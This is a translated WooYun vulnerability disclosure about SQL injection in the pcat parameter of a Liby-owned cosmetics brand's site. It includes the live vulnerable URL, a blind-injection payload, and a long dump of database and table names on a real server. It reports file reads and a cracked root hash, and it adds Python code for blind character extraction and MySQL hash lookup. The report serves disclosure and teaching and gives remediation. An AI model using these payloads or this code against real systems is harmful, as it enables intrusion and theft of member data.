Vulnerability summary

Defect ID: wooyun-2016-0177171

Title: SQL injection on the website of a brand owned by Liby (立白), affecting multiple databases

Vendor: Guangzhou Liby Enterprise Group Co., Ltd. (广州立白企业集团有限公司)

Author: pudding2

Submitted: 2016-02-20 08:08

Fix time: 2016-02-25 08:10

Published: 2016-02-25 08:10

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-02-20: details sent to the vendor, awaiting vendor handling
2016-02-25: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

The website of a Liby-owned brand has a SQL injection vulnerability that exposes multiple databases.

Detailed description:

Cogi Cosmetics Co., Ltd. (高姿化妆品有限公司) has more than 20 years of history and is a well-known cosmetics company in China's daily-chemical industry.
Its consistent product quality has earned it the trust and praise of consumers. In 2006 the company went through an asset restructuring with the Liby Group, which produced Shanghai New Cogi Cosmetics Co., Ltd. (上海新高姿化妆品有限公司) in the fiercely competitive cosmetics market.

[screenshot: 1.jpg]


Vulnerable URL: http://www.cogi.cn/pcat.php?pcat=1 (GET)
The Cogi (高姿) website, a Liby brand, has a SQL injection vulnerability affecting multiple databases. The pcat parameter is placed into the query unsanitized; probing it shows a boolean-based blind injection, and the database session runs as root with DBA rights:

---
Parameter: pcat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pcat=1 AND 6422=6422
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.12
back-end DBMS: MySQL 5
current user: 'root@localhost'
current database: 'db_cogi'
current user is DBA: True
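The boolean-based blind injection above, modeled as an added example that is not code from the original report or from the site: an in-memory SQLite stand-in for the site's MySQL database, a handler that splices the pcat value into the SQL text the way the vulnerable page evidently does, the hardened equivalent, and a character-by-character extraction that relies on nothing but the true/false page difference exposed by the report's `pcat=1 AND 6422=6422` probe. All column names, category names and the stored password value are constructed for the demo; only the table names tb_pcat and tb_user come from the report's listing of db_cogi.

```python
import sqlite3

# Constructed stand-in for the site's database (assumption: the real column
# names and contents are unknown; only the table names appear in the report).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE tb_pcat (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO tb_pcat VALUES (1, 'skin care'), (2, 'make-up');
CREATE TABLE tb_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO tb_user VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
""")


def vulnerable_pcat(pcat: str) -> bool:
    """Models pcat.php: the raw GET value is concatenated into the SQL text.
    Returns True when a category row comes back (the page renders content)
    and False when it does not; that one-bit difference is the blind oracle."""
    sql = "SELECT name FROM tb_pcat WHERE id = " + pcat  # the injection
    return conn.execute(sql).fetchone() is not None


def safe_pcat(pcat: str):
    """Hardened handler: validate the type, then bind the value as a parameter."""
    if not pcat.isdigit():
        return None  # anything that is not a plain integer id is rejected
    row = conn.execute("SELECT name FROM tb_pcat WHERE id = ?", (int(pcat),)).fetchone()
    return row[0] if row else None


def oracle(condition: str) -> bool:
    """One true/false probe of the same shape as the report's 'pcat=1 AND 6422=6422'."""
    return vulnerable_pcat("1 AND (" + condition + ")")


def blind_char(subquery: str, pos: int, lo: int = 32, hi: int = 126):
    """Binary-search one character of the subquery's result over printable ASCII,
    about seven requests per character instead of one per candidate.
    SQLite spelling; on MySQL the same probe would be ORD(SUBSTRING(...))."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    # Confirm the candidate. Past the end of the string substr() yields '' and
    # unicode('') is NULL, so every comparison is false and None is returned.
    if oracle("unicode(substr((%s), %d, 1)) = %d" % (subquery, pos, lo)):
        return chr(lo)
    return None


def blind_extract(subquery: str, max_len: int = 64) -> str:
    """Recover a whole string using only the page's true/false behaviour."""
    out = ""
    for pos in range(1, max_len + 1):
        ch = blind_char(subquery, pos)
        if ch is None:
            break
        out += ch
    return out


if __name__ == "__main__":
    print(vulnerable_pcat("1 AND 6422=6422"), vulnerable_pcat("1 AND 6422=6423"))
    print(blind_extract("SELECT password FROM tb_user WHERE username = 'admin'"))
    print(safe_pcat("1 AND 6422=6422"))  # None: the payload never reaches the SQL parser
```

The extraction never sees query output; it only observes whether a category renders, which is exactly why "boolean-based blind" is enough to dump every database the session can read. The hardened handler shows the two-part fix: reject values that are not the expected type, and pass the value as a bound parameter so the SQL text never changes.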


Multiple databases are reachable through this injection point. The list includes the mysql system database itself, which is what makes the account hashes in the proof section below readable:

Database: sms_3
[6 tables]
+----------------------------------------------+
| sms_clients |
| sms_kv |
| sms_news |
| sms_picture |
| sms_show |
| sms_user |
+----------------------------------------------+
Database: hrapp
[14 tables]
+----------------------------------------------+
| ad_access |
| ad_admin |
| ad_field |
| ad_input |
| ad_model |
| ad_node |
| ad_order |
| ad_photo |
| ad_photo_like |
| ad_question |
| ad_role |
| ad_role_admin |
| ad_test |
| ad_user |
+----------------------------------------------+
Database: hikalimedia
[5 tables]
+----------------------------------------------+
| hik_category |
| hik_kvlist |
| hik_product |
| hik_thumb |
| hik_user |
+----------------------------------------------+
Database: cogi
[2 tables]
+----------------------------------------------+
| cogi_register |
| cogi_user |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: cat_maxmara_150624
[22 tables]
+----------------------------------------------+
| cms_article |
| cms_article_cate |
| cms_material |
| mar_action |
| mar_bag |
| mar_banner |
| mar_city |
| mar_classify |
| mar_cloths |
| mar_lastvideo |
| mar_shop |
| mar_video |
| mar_word |
| shop_organization |
| sys_company |
| sys_log |
| sys_permission |
| sys_role |
| sys_role_permission |
| sys_user |
| sys_user_role |
| sys_welcome |
+----------------------------------------------+
Database: smartdb
[5 tables]
+----------------------------------------------+
| smart_case |
| smart_category |
| smart_consulting |
| smart_dynamic |
| smart_user |
+----------------------------------------------+
Database: zhoudafu
[4 tables]
+----------------------------------------------+
| zdf_admin |
| zdf_blesses |
| zdf_modules |
| zdf_users |
+----------------------------------------------+
Database: elle_db_a
[7 tables]
+----------------------------------------------+
| calendars |
| kvimage |
| mybenefits |
| mybenefitsaddress |
| styles |
| styles4pic |
| userinfo |
+----------------------------------------------+
Database: vendor3
[19 tables]
+----------------------------------------------+
| module |
| category |
| comment |
| content3 |
| contentindex |
| greetingcard |
| log |
| manager |
| member |
| menu |
| module_field |
| schools |
| serviceorders |
| sessionvalue |
| spider_log |
| typelist |
| usergroup |
| webconfig |
| webconfig_param |
+----------------------------------------------+
Database: zphome
[159 tables]
+----------------------------------------------+
| TABLE 106 |
| a_admin |
| a_modules |
| a_projects |
| adidas1309_photos |
| aha_admin |
| aha_anwsers |
| aha_ranks |
| aha_results |
| aha_shares |
| aha_stageanswers |
| aha_users |
| artistry151012 |
| banggo4_codes |
| banggo4_prizes |
| banggo4_scores |
| banggo_admin |
| banggo_blocks |
| banggo_data |
| banggo_daygifts |
| banggo_gameinfos |
| banggo_gifts |
| banggo_modules |
| banggo_questions |
| banggo_settings |
| banggo_tasks |
| banggo_transactions |
| banggo_userexchanges |
| banggo_usergifts |
| banggo_users |
| banggo_usertasks |
| chanel0611_admin |
| chanel0611_modules |
| chanel0611_photos |
| christmas_admin |
| christmas_goods |
| christmas_modules |
| christmas_photos |
| cms_categories |
| cms_comments |
| cms_extend |
| cms_meta |
| cms_page_meta |
| cms_pages |
| cms_post_meta |
| cms_posts |
| cms_sessions |
| cms_users |
| cogiegg_admin |
| cogiegg_breaks |
| cogiegg_gifts |
| cogiegg_modules |
| cogiegg_prizes |
| cogiegg_users |
| dove130531_userimages |
| dove130531_users |
| edm_users |
| esteelauder1403_photos |
| esteelauder1403_votes |
| helena_register |
| helena_user |
| hr_white_users |
| lavenue_active |
| lavenue_brand |
| lavenue_category |
| lavenue_club |
| lavenue_newopen |
| lavenue_news |
| lavenue_register |
| lavenue_thumb |
| lavenue_user |
| lavenue_vedio |
| loreal100_admin |
| loreal100_adminmodules |
| loreal100_users |
| loreal100_votes |
| lux1304_admin |
| lux1304_blackips |
| lux1304_cards |
| lux1304_cards_001 |
| lux1304_modules |
| lux1304_offlines |
| lux1304_shares |
| lux1304_tests_001 |
| lux1304_tests_new |
| lux1304_users |
| lux1304_users_001 |
| lux1304_users_002 |
| lux1304_users_003 |
| mascara_users |
| maxmara0428_register |
| maxmara0428_user |
| maxmara150512 |
| maxmara_prize |
| maxmara_register |
| maxmara_registerprize |
| maxmara_score |
| maxmara_user |
| maxmara_webconfig |
| maxmara_winaprize |
| maxus0820_admin |
| maxus0820_ci_sessions |
| maxus0820_config_common |
| maxus0820_config_site |
| maxus0820_config_site_admin |
| maxus0820_model |
| maxus0820_power |
| maxus0820_power_group |
| maxus0820_vote |
| mrts_wechat_0 |
| neiman_votes |
| nzj_register |
| nzj_user |
| nzj_vote |
| oreal0721_admin |
| oreal0721_candidate_info |
| oreal0721_ci_sessions |
| oreal0721_config_common |
| oreal0721_config_site |
| oreal0721_config_site_admin |
| oreal0721_power |
| oreal0721_power_group |
| oreal0721_vote_log |
| prodigycream_users |
| pt0819 |
| pt1225_prd |
| pt1225_vote |
| restylane1304_admin |
| restylane1304_modules |
| restylane1304_smiles |
| restylane1304_tips |
| restylane1304_userimages |
| restylane1304_users |
| restylane1304_votes |
| sheep_userimages |
| sheep_users |
| sheep_votes |
| shj2012_users |
| siemens_blesses |
| tiffany1403_votes |
| whiteadmin |
| whiteuserinfo |
| whiteusers |
| whiteusertips |
| yvesrocher_users |
| zdf_admin |
| zdf_blesses |
| zdf_modules |
| zdf_users |
| zdfu_prize |
| zdfu_register |
| zdfu_registerprize |
| zdfu_score |
| zdfu_user |
| zdfu_webconfig |
| zdfu_winaprize |
| zippo151121_code |
| zippo151121_lottery |
| zippo151121_user |
+----------------------------------------------+
Database: test
[7 tables]
+----------------------------------------------+
| calendars |
| kvimage |
| mybenefits |
| mybenefitsaddress |
| styles |
| styles4pic |
| userinfo |
+----------------------------------------------+
Database: v6_hr
[3 tables]
+----------------------------------------------+
| customer |
| first_five_invit |
| regular_customer |
+----------------------------------------------+
Database: style_business
[17 tables]
+----------------------------------------------+
| ds_brand |
| ds_category |
| ds_colour |
| ds_deliveryaddress |
| ds_emailtemplate |
| ds_excandpro |
| ds_exclusive |
| ds_homepage |
| ds_homepagepro |
| ds_message |
| ds_messagetype |
| ds_orders |
| ds_product |
| ds_register |
| ds_shoppingcart |
| ds_thumb |
| ds_user |
+----------------------------------------------+
Database: kc_db
[6 tables]
+----------------------------------------------+
| kc_clients |
| kc_kv |
| kc_news |
| kc_picture |
| kc_show |
| kc_user |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+
Database: iaactdb
[6 tables]
+----------------------------------------------+
| iaact_clients |
| iaact_kv |
| iaact_news |
| iaact_picture |
| iaact_show |
| iaact_user |
+----------------------------------------------+
Database: johnhenry
[5 tables]
+----------------------------------------------+
| archive_coupon |
| archive_register |
| archive_registercoupon |
| archive_user |
| archive_webconfig |
+----------------------------------------------+
Database: db_cogi
[9 tables]
+----------------------------------------------+
| tb_article |
| tb_media |
| tb_menber |
| tb_pcat |
| tb_prd |
| tb_pseries |
| tb_star |
| tb_trend |
| tb_user |
+----------------------------------------------+
Database: asus100
[7 tables]
+----------------------------------------------+
| asus_hobbytype |
| asus_person |
| asus_picture |
| asus_user |
| asus_usertype |
| asus_weibomsg |
| asus_weibotype |
+----------------------------------------------+
Database: wechatcms
[283 tables]
+----------------------------------------------+
| hr_admin |
| hr_details |
| hr_gifts |
| hr_orders |
| hr_users |
| pigcms_access |
| pigcms_activity |
| pigcms_adma |
| pigcms_alipay_config |
| pigcms_api |
| pigcms_areply |
| pigcms_attribute |
| pigcms_autumns_box |
| pigcms_autumns_ip |
| pigcms_autumns_open |
| pigcms_banners |
| pigcms_behavior |
| pigcms_broker |
| pigcms_broker_client |
| pigcms_broker_commission |
| pigcms_broker_item |
| pigcms_broker_optionlog |
| pigcms_broker_translation |
| pigcms_broker_user |
| pigcms_busines |
| pigcms_busines_comment |
| pigcms_busines_main |
| pigcms_busines_pic |
| pigcms_busines_second |
| pigcms_car |
| pigcms_car_utility |
| pigcms_carmodel |
| pigcms_carnews |
| pigcms_carowner |
| pigcms_carsaler |
| pigcms_carseries |
| pigcms_carset |
| pigcms_caruser |
| pigcms_case |
| pigcms_caseclass |
| pigcms_catemenu |
| pigcms_classify |
| pigcms_company |
| pigcms_company_staff |
| pigcms_crowdfunding |
| pigcms_crowdfunding_focus |
| pigcms_crowdfunding_order |
| pigcms_crowdfunding_reward |
| pigcms_custom_field |
| pigcms_custom_info |
| pigcms_custom_limit |
| pigcms_custom_set |
| pigcms_dining_table |
| pigcms_dish |
| pigcms_dish_company |
| pigcms_dish_like |
| pigcms_dish_order |
| pigcms_dish_sort |
| pigcms_dish_table |
| pigcms_dishout_manage |
| pigcms_dishout_salelog |
| pigcms_diyform |
| pigcms_diyform_set |
| pigcms_diymen_class |
| pigcms_diymen_set |
| pigcms_dream |
| pigcms_estate |
| pigcms_estate_album |
| pigcms_estate_expert |
| pigcms_estate_housetype |
| pigcms_estate_impress |
| pigcms_estate_impress_add |
| pigcms_estate_nav |
| pigcms_estate_son |
| pigcms_files |
| pigcms_flash |
| pigcms_forum_comment |
| pigcms_forum_config |
| pigcms_forum_message |
| pigcms_forum_topics |
| pigcms_funclass |
| pigcms_function |
| pigcms_funintro |
| pigcms_game_config |
| pigcms_game_records |
| pigcms_games |
| pigcms_greeting_card |
| pigcms_helping |
| pigcms_helping_user |
| pigcms_home |
| pigcms_home_background |
| pigcms_host |
| pigcms_host_list_add |
| pigcms_host_order |
| pigcms_hotels_house |
| pigcms_hotels_house_sort |
| pigcms_hotels_image |
| pigcms_hotels_order |
| pigcms_images |
| pigcms_img |
| pigcms_img_multi |
| pigcms_indent |
| pigcms_invite |
| pigcms_invite_enroll |
| pigcms_invite_meeting |
| pigcms_invite_partner |
| pigcms_invite_plan |
| pigcms_invite_user |
| pigcms_keyword |
| pigcms_leave |
| pigcms_links |
| pigcms_live |
| pigcms_live_company |
| pigcms_live_content |
| pigcms_lottery |
| pigcms_lottery_cheat |
| pigcms_lottery_record |
| pigcms_market |
| pigcms_market_area |
| pigcms_market_cate |
| pigcms_market_nav |
| pigcms_market_park |
| pigcms_market_slide |
| pigcms_medical_set |
| pigcms_medical_user |
| pigcms_member |
| pigcms_member_card_contact |
| pigcms_member_card_coupon |
| pigcms_member_card_coupon_record |
| pigcms_member_card_create |
| pigcms_member_card_custom |
| pigcms_member_card_exchange |
| pigcms_member_card_focus |
| pigcms_member_card_gifts |
| pigcms_member_card_info |
| pigcms_member_card_integral |
| pigcms_member_card_notice |
| pigcms_member_card_pay_record |
| pigcms_member_card_set |
| pigcms_member_card_sign |
| pigcms_member_card_use_record |
| pigcms_member_card_vip |
| pigcms_mobilesite |
| pigcms_moopha_article |
| pigcms_moopha_attachement |
| pigcms_moopha_channel |
| pigcms_moopha_channel_contentattribute |
| pigcms_moopha_keywords |
| pigcms_moopha_picture |
| pigcms_moopha_site |
| pigcms_moopha_template |
| pigcms_moopha_user |
| pigcms_msg |
| pigcms_nearby_user |
| pigcms_news |
| pigcms_node |
| pigcms_norms |
| pigcms_notice_record |
| pigcms_ordering_class |
| pigcms_ordering_set |
| pigcms_orderprinter |
| pigcms_other |
| pigcms_panorama |
| pigcms_photo |
| pigcms_photo_list |
| pigcms_photo_log |
| pigcms_platform_pay |
| pigcms_popularity |
| pigcms_popularity_prize |
| pigcms_popularity_share |
| pigcms_popularity_user |
| pigcms_present |
| pigcms_problem_game |
| pigcms_problem_option |
| pigcms_problem_question |
| pigcms_problem_question_log |
| pigcms_problem_user |
| pigcms_product |
| pigcms_product_attribute |
| pigcms_product_cart |
| pigcms_product_cart_list |
| pigcms_product_cat |
| pigcms_product_comment |
| pigcms_product_detail |
| pigcms_product_diningtable |
| pigcms_product_group |
| pigcms_product_image |
| pigcms_product_mail_price |
| pigcms_product_relation |
| pigcms_product_setting |
| pigcms_punish |
| pigcms_punish_item |
| pigcms_qcloud_sendout |
| pigcms_qcloud_user |
| pigcms_question_bank |
| pigcms_recipe |
| pigcms_recognition |
| pigcms_red_packet |
| pigcms_red_packet_exchange |
| pigcms_red_packet_log |
| pigcms_red_packet_prize |
| pigcms_red_packet_reward |
| pigcms_renew |
| pigcms_reply |
| pigcms_reply_info |
| pigcms_requestdata |
| pigcms_research |
| pigcms_research_answer |
| pigcms_research_question |
| pigcms_research_result |
| pigcms_reservation |
| pigcms_reservebook |
| pigcms_role |
| pigcms_role_user |
| pigcms_router |
| pigcms_router_config |
| pigcms_school_cat |
| pigcms_school_classify |
| pigcms_school_score |
| pigcms_school_set_index |
| pigcms_school_students |
| pigcms_school_tcourse |
| pigcms_school_teachers |
| pigcms_seckill_action |
| pigcms_seckill_base_shop |
| pigcms_seckill_book |
| pigcms_seckill_share |
| pigcms_seckill_shop_thum |
| pigcms_seckill_users |
| pigcms_selfform |
| pigcms_selfform_input |
| pigcms_selfform_value |
| pigcms_send_message |
| pigcms_share |
| pigcms_share_set |
| pigcms_sign_conf |
| pigcms_sign_in |
| pigcms_sign_set |
| pigcms_site_plugmenu |
| pigcms_sms_code |
| pigcms_sms_expendrecord |
| pigcms_sms_record |
| pigcms_snccode |
| pigcms_store_flash |
| pigcms_styleset |
| pigcms_system_info |
| pigcms_taobao |
| pigcms_tempmsg |
| pigcms_text |
| pigcms_token_open |
| pigcms_twitter_count |
| pigcms_twitter_log |
| pigcms_twitter_remove |
| pigcms_twitter_set |
| pigcms_unitary |
| pigcms_unitary_cart |
| pigcms_unitary_lucknum |
| pigcms_unitary_order |
| pigcms_unitary_user |
| pigcms_update_record |
| pigcms_upyun_attachement |
| pigcms_user |
| pigcms_user_group |
| pigcms_user_request |
| pigcms_userinfo |
| pigcms_users |
| pigcms_voiceresponse |
| pigcms_vote |
| pigcms_vote_item |
| pigcms_vote_record |
| pigcms_weather |
| pigcms_wecha_user |
| pigcms_wechat_group |
| pigcms_wechat_group_list |
| pigcms_wechat_scene |
| pigcms_wecht_grout |
| pigcms_wedding |
| pigcms_wedding_info |
| pigcms_wehcat_member_enddate |
| pigcms_wxuser |
| pigcms_yeepay_tmp |
| pigcms_zhida |
| tp_system_info |
+----------------------------------------------+
Database: techpool
[16 tables]
+----------------------------------------------+
| meet_answer |
| meet_guestinfo |
| meet_invite |
| meet_meetingguestrelation |
| meet_meetinginfo |
| meet_meetingplace |
| meet_meetingtype |
| meet_meetinguserrelation |
| meet_news |
| meet_optionresult |
| meet_question |
| meet_schedule |
| meet_talentplan |
| meet_user |
| meet_userinfo |
| meet_userloginfo |
+----------------------------------------------+
Database: web0
[13 tables]
+----------------------------------------------+
| ad_access |
| ad_admin |
| ad_field |
| ad_input |
| ad_model |
| ad_node |
| ad_order |
| ad_photo |
| ad_photo_like |
| ad_question |
| ad_role |
| ad_role_admin |
| ad_user |
+----------------------------------------------+
Database: tianpu
[27 tables]
+----------------------------------------------+
| cms_article |
| cms_article_cate |
| cms_material |
| hos_article |
| hos_comment |
| hos_conference |
| hos_guide |
| hos_newspper |
| hos_notice_contributors |
| hos_subject |
| hos_time |
| hos_time_newspper |
| hos_transshipment |
| hos_video |
| hos_video_type |
| hos_writer |
| hos_writer_type |
| hos_year |
| shop_organization |
| sys_company |
| sys_log |
| sys_permission |
| sys_role |
| sys_role_permission |
| sys_user |
| sys_user_role |
| sys_welcome |
+----------------------------------------------+
Database: appnice
[26 tables]
+----------------------------------------------+
| admin |
| api_access |
| api_keys |
| api_limits |
| api_logs |
| api_tokens |
| comments |
| config_common |
| config_site |
| config_site_admin |
| integrals |
| labels |
| labels2stores |
| messages |
| operates |
| photos |
| power |
| power_group |
| push_logs |
| recommend_type |
| sources |
| stores |
| tags |
| thesaurus |
| tops |
| users |
+----------------------------------------------+
Database: vendor_a
[6 tables]
+----------------------------------------------+
| forte06_greetingcard |
| forte06_manager |
| forte06_menu |
| forte06_usergroup |
| forte06_webconfig |
| forte06_webconfig_param |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: hrapp_crowdfunding2016
[15 tables]
+----------------------------------------------+
| ad_access |
| ad_admin |
| ad_field |
| ad_input |
| ad_model |
| ad_node |
| ad_order |
| ad_order_pay_detail |
| ad_paytest |
| ad_photo |
| ad_product |
| ad_question |
| ad_role |
| ad_role_admin |
| ad_user |
+----------------------------------------------+
Database: vendor1
[36 tables]
+----------------------------------------------+
| elle0811_members |
| elle0811_users |
| elle0811_votes |
| forte150521_awards |
| forte150521_draws |
| forte150521_userinfos |
| forte150521_users |
| forte150921_cities |
| forte150921_donates |
| forte150921_members |
| forte150921_projects |
| forte150921_userinfos |
| forte150921_users |
| honda0720_likes |
| honda0720_photos |
| honda0720_users |
| hr150211_messages |
| hr150211_users |
| lavenue_active |
| lavenue_brand |
| lavenue_category |
| lavenue_club |
| lavenue_newopen |
| lavenue_news |
| lavenue_register |
| lavenue_thumb |
| lavenue_user |
| lavenue_vedio |
| techpool_meetings |
| techpool_members |
| techpool_signs |
| techpool_users |
| zippo_codes |
| zippo_members |
| zippo_users |
| zippo_votes |
+----------------------------------------------+
Database: styletv
[4 tables]
+----------------------------------------------+
| tb_bindaccount |
| tb_generalize |
| tb_sysinfo |
| tb_user |
+----------------------------------------------+
Database: acense
[3 tables]
+----------------------------------------------+
| dolls |
| migrations |
| tools |
+----------------------------------------------+
Database: vendor5
[24 tables]
+----------------------------------------------+
| 360_categories_entries |
| 360_categories |
| 360_category_groups |
| 360_content_field_types |
| 360_content_fields |
| 360_content_types_admin_groups |
| 360_content_types |
| 360_entries_data |
| 360_entries |
| 360_galleries |
| 360_gallery_images |
| 360_groups |
| 360_navigation_items |
| 360_navigations |
| 360_product_forward |
| 360_product_post |
| 360_product |
| 360_publish_logs |
| 360_revision_resource_types |
| 360_revisions |
| 360_settings |
| 360_snippets |
| 360_users |
| 360_weibo_user |
+----------------------------------------------+
Database: vendor4
[40 tables]
+----------------------------------------------+
| module |
| advert |
| category |
| comment |
| content29 |
| content3 |
| content30 |
| content31 |
| content32 |
| content33 |
| contentindex |
| log |
| manager |
| member |
| menu |
| mlqs_category |
| mlqs_comment |
| mlqs_content3 |
| mlqs_contentindex |
| mlqs_log |
| mlqs_manager |
| mlqs_member |
| mlqs_menu |
| mlqs_module |
| mlqs_module_field |
| mlqs_schools |
| mlqs_sessionvalue |
| mlqs_spider_log |
| mlqs_typelist |
| mlqs_usergroup |
| mlqs_webconfig |
| mlqs_webconfig_param |
| mlqs_weekresult |
| module_field |
| schools |
| spider_log |
| typelist |
| usergroup |
| webconfig |
| webconfig_param |
+----------------------------------------------+
Database: cat_money
[47 tables]
+----------------------------------------------+
| cms_article |
| cms_article_cate |
| cms_material |
| man_advertise |
| man_advertise_audit |
| man_advice |
| man_bankcard |
| man_banner |
| man_bill |
| man_borrower |
| man_buyinfo |
| man_check |
| man_credite |
| man_credite_bag |
| man_dart_get |
| man_dart_send |
| man_dart_week |
| man_dictionary |
| man_exception |
| man_export |
| man_firstbanner |
| man_formula |
| man_hold_image |
| man_interest |
| man_often_quest |
| man_page |
| man_pay_order |
| man_pro_crbag |
| man_product_lock |
| man_product_nolock |
| man_profit |
| man_profit_info |
| man_push |
| man_recharge |
| man_redeem |
| man_subscribe |
| man_trade |
| man_user |
| shop_organization |
| sys_company |
| sys_log |
| sys_permission |
| sys_role |
| sys_role_permission |
| sys_user |
| sys_user_role |
| sys_welcome |
+----------------------------------------------+
Database: cat_iself
[26 tables]
+----------------------------------------------+
| cms_article |
| cms_article_cate |
| cms_material |
| is_area |
| is_check |
| is_city |
| is_collect |
| is_custom |
| is_like |
| is_privilege |
| is_product |
| is_season_action |
| is_shop |
| is_travel |
| is_tripInfo |
| is_user |
| is_user_like |
| shop_organization |
| sys_company |
| sys_log |
| sys_permission |
| sys_role |
| sys_role_permission |
| sys_user |
| sys_user_role |
| sys_welcome |
+----------------------------------------------+


Nearly 20,000 Cogi (高姿) member account records are exposed (row counts for db_cogi):

Database: db_cogi
+------------+---------+
| Table | Entries |
+------------+---------+
| tb_menber | 19522 |
| tb_prd | 227 |
| tb_media | 101 |
| tb_trend | 88 |
| tb_pseries | 32 |
| tb_pcat | 19 |
| tb_article | 4 |
| tb_star | 2 |
| tb_user | 2 |
+------------+---------+


Because the session runs as root@localhost with DBA rights, the server's file system is reachable as well: /etc/passwd can be read.

[screenshot: QQ截图20160219233402.jpg]

Proof of vulnerability:

User passwords in multiple databases can be read:

[screenshot: 21.jpg]


The database root user's password can be recovered through cmd5 (an online hash lookup service):

[screenshot: 3.jpg]
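The root hash read out of mysql.user was recovered through cmd5. That works because MySQL 5's native password hash is unsalted double SHA-1, so a single precomputed table answers every hash ever submitted to such a service. The following added example, which is not code from the report, computes that hash format, recognises it in values pulled from mysql.user, and performs the equivalent lookup offline against a constructed wordlist; the wordlist and the sample password are assumptions, not the real credentials.

```python
import hashlib
from typing import Dict, Iterable, Optional


def mysql_native_hash(password: str) -> str:
    """MySQL 4.1+/5.x PASSWORD(): '*' followed by upper-case hex of SHA1(SHA1(pw)).
    No salt, so identical passwords always produce identical hashes."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def is_mysql_native_hash(value: str) -> bool:
    """Shape check for a value read from mysql.user.Password: '*' + 40 hex digits."""
    return (len(value) == 41 and value[0] == "*"
            and all(c in "0123456789ABCDEF" for c in value[1:]))


def build_lookup_table(wordlist: Iterable[str]) -> Dict[str, str]:
    """Precompute hash -> password once; this is what an online lookup service
    amortises across every hash it is ever asked about."""
    return {mysql_native_hash(w): w for w in wordlist}


def lookup(target_hash: str, table: Dict[str, str]) -> Optional[str]:
    """Offline equivalent of the cmd5 step: one dictionary probe per hash."""
    if not is_mysql_native_hash(target_hash.upper()):
        return None
    return table.get(target_hash.upper())


# Constructed wordlist for the demo (assumption: not the site's real root password).
DEMO_WORDLIST = ["123456", "password", "root", "admin123", "cogi2016"]


if __name__ == "__main__":
    table = build_lookup_table(DEMO_WORDLIST)
    stolen = mysql_native_hash("cogi2016")  # stands in for the hash read via the injection
    print(stolen, "->", lookup(stolen, table))
```

A weak root password combined with an unsalted hash turns "can read mysql.user" into "has the root password"; rotating the password to a long random value removes the second step, and running the web application as a non-DBA account removes the first.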

Remediation:

Filter and parameterize the pcat input, and change the database password. Since the injection runs as root with DBA rights, the web application should also connect with its own least-privileged MySQL account rather than root.

Copyright notice: when reposting, credit the source as pudding2@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: no impact, ignored by the vendor

Ignored at: 2016-02-25 08:10

Vendor reply:

Vulnerability Rank: 4 (WooYun assessment)

Latest status:

None

